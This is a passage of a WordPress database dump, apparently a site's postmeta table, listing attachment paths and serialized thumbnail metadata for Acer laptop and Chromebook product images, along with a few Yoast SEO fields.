g'),(2749,2310,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:338;s:6:\"height\";i:250;s:4:\"file\";s:48:\"2018/12/Acer_Switch_Alpha_12_SA5-271-preview.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Acer_Switch_Alpha_12_SA5-271-preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:48:\"Acer_Switch_Alpha_12_SA5-271-preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:46:\"Acer_Switch_Alpha_12_SA5-271-preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2750,2311,'_wp_attached_file','2018/12/Acer-Chromebook-Tab-10-D651N-preview.png'),(2751,2311,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:474;s:6:\"height\";i:351;s:4:\"file\";s:48:\"2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Acer-Chromebook-Tab-10-D651N-preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"Acer-Chromebook-Tab-10-D651N-preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:48:\"Acer-Chromebook-Tab-10-D651N-preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:48:\"Acer-Chromebook-Tab-10-D651N-preview-474x300.png\";s:5:\"width\";i:474;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:46:\"Acer-Chromebook-Tab-10-D651N-preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2752,2312,'_wp_attached_file','2018/12/Chromebook-R-13_preview.png'),(2753,2312,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:474;s:6:\"height\";i:351;s:4:\"file\";s:35:\"2018/12/Chromebook-R-13_preview.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Chromebook-R-13_preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"Chromebook-R-13_preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"Chromebook-R-13_preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:35:\"Chromebook-R-13_preview-474x300.png\";s:5:\"width\";i:474;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:33:\"Chromebook-R-13_preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2754,2313,'_wp_attached_file','2018/12/Chromebook_14-sku-preview.png'),(2755,2313,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:338;s:6:\"height\";i:250;s:4:\"file\";s:37:\"2018/12/Chromebook_14-sku-preview.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"Chromebook_14-sku-preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"Chromebook_14-sku-preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:37:\"Chromebook_14-sku-preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:35:\"Chromebook_14-sku-preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2756,2314,'_wp_attached_file','2018/12/Acer_CP5-471_black-sku-preview.png'),(2757,2314,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:338;s:6:\"height\";i:250;s:4:\"file\";s:42:\"2018/12/Acer_CP5-471_black-sku-preview.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"Acer_CP5-471_black-sku-preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"Acer_CP5-471_black-sku-preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:42:\"Acer_CP5-471_black-sku-preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:40:\"Acer_CP5-471_black-sku-preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2758,2315,'_wp_attached_file','2018/12/C730-nontouch-sku-preview.png'),(2759,2315,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:474;s:6:\"height\";i:351;s:4:\"file\";s:37:\"2018/12/C730-nontouch-sku-preview.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"C730-nontouch-sku-preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"C730-nontouch-sku-preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:37:\"C730-nontouch-sku-preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:37:\"C730-nontouch-sku-preview-474x300.png\";s:5:\"width\";i:474;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:35:\"C730-nontouch-sku-preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2760,2316,'_wp_attached_file','2018/12/AcerChromebookR11_C738T_black-sku-preview.png'),(2761,2316,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:338;s:6:\"height\";i:250;s:4:\"file\";s:53:\"2018/12/AcerChromebookR11_C738T_black-sku-preview.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"AcerChromebookR11_C738T_black-sku-preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"AcerChromebookR11_C738T_black-sku-preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:53:\"AcerChromebookR11_C738T_black-sku-preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:51:\"AcerChromebookR11_C738T_black-sku-preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2762,2317,'_wp_attached_file','2018/12/Chromebook-11-N7_preview.png'),(2763,2317,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:474;s:6:\"height\";i:351;s:4:\"file\";s:36:\"2018/12/Chromebook-11-N7_preview.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"Chromebook-11-N7_preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"Chromebook-11-N7_preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:36:\"Chromebook-11-N7_preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:36:\"Chromebook-11-N7_preview-474x300.png\";s:5:\"width\";i:474;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:34:\"Chromebook-11-N7_preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2764,1430,'_yoast_wpseo_content_score','30'),(2765,2319,'_wp_attached_file','2018/12/TM-Spin-B118_preview.png'),(2766,2319,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:474;s:6:\"height\";i:351;s:4:\"file\";s:32:\"2018/12/TM-Spin-B118_preview.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"TM-Spin-B118_preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"TM-Spin-B118_preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:32:\"TM-Spin-B118_preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:32:\"TM-Spin-B118_preview-474x300.png\";s:5:\"width\";i:474;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:30:\"TM-Spin-B118_preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2767,2320,'_wp_attached_file','2018/12/TravelMate-P246M-sku-preview.png'),(2768,2320,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:474;s:6:\"height\";i:351;s:4:\"file\";s:40:\"2018/12/TravelMate-P246M-sku-preview.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"TravelMate-P246M-sku-preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"TravelMate-P246M-sku-preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:40:\"TravelMate-P246M-sku-preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:40:\"TravelMate-P246M-sku-preview-474x300.png\";s:5:\"width\";i:474;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:38:\"TravelMate-P246M-sku-preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2769,2321,'_wp_attached_file','2018/12/TMP4-product-series-preview.png'),(2770,2321,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:474;s:6:\"height\";i:351;s:4:\"file\";s:39:\"2018/12/TMP4-product-series-preview.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"TMP4-product-series-preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"TMP4-product-series-preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:39:\"TMP4-product-series-preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:39:\"TMP4-product-series-preview-474x300.png\";s:5:\"width\";i:474;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:37:\"TMP4-product-series-preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2771,2322,'_wp_attached_file','2018/12/TravelMate-P658-preview.png'),(2772,2322,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:338;s:6:\"height\";i:250;s:4:\"file\";s:35:\"2018/12/TravelMate-P658-preview.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"TravelMate-P658-preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"TravelMate-P658-preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"TravelMate-P658-preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:33:\"TravelMate-P658-preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2773,1430,'_yoast_wpseo_focuskw','Acer Malaysia'),(2774,1430,'_yoast_wpseo_linkdex','47'),(2775,1430,'_yoast_wpseo_metadesc','Perfect blend of laptop and tablet, with a mode to fit into every situation.'),(2778,2329,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:372;s:6:\"height\";i:372;s:4:\"file\";s:32:\"2018/12/cq5dam.web_.372.372.jpeg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"cq5dam.web_.372.372-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"cq5dam.web_.372.372-300x300.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:32:\"cq5dam.web_.372.372-300x150.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:32:\"cq5dam.web_.372.372-372x300.jpeg\";s:5:\"width\";i:372;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:30:\"cq5dam.web_.372.372-20x20.jpeg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2779,2330,'_wp_attached_file','2018/12/cq5dam.web_.1000.1000.jpeg'),(2780,2330,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:34:\"2018/12/cq5dam.web_.1000.1000.jpeg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"cq5dam.web_.1000.1000-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"cq5dam.web_.1000.1000-300x300.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"cq5dam.web_.1000.1000-768x768.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:34:\"cq5dam.web_.1000.1000-300x150.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:34:\"cq5dam.web_.1000.1000-480x300.jpeg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:34:\"cq5dam.web_.1000.1000-640x400.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:32:\"cq5dam.web_.1000.1000-20x20.jpeg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2781,2331,'_wp_attached_file','2018/12/372.png'),(2782,2331,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:372;s:6:\"height\";i:372;s:4:\"file\";s:15:\"2018/12/372.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"372-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"372-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:15:\"372-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:15:\"372-372x300.png\";s:5:\"width\";i:372;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:13:\"372-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2783,2332,'_wp_attached_file','2018/12/cq5dam.web_.372.372-1.jpeg'),(2784,2332,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:372;s:6:\"height\";i:372;s:4:\"file\";s:34:\"2018/12/cq5dam.web_.372.372-1.jpeg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"cq5dam.web_.372.372-1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"cq5dam.web_.372.372-1-300x300.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:34:\"cq5dam.web_.372.372-1-300x150.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:34:\"cq5dam.web_.372.372-1-372x300.jpeg\";s:5:\"width\";i:372;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:32:\"cq5dam.web_.372.372-1-20x20.jpeg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2785,2334,'_wp_attached_file','2018/12/cq5dam.web_.372.372-2.jpeg'),(2786,2334,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:372;s:6:\"height\";i:372;s:4:\"file\";s:34:\"2018/12/cq5dam.web_.372.372-2.jpeg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"cq5dam.web_.372.372-2-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s: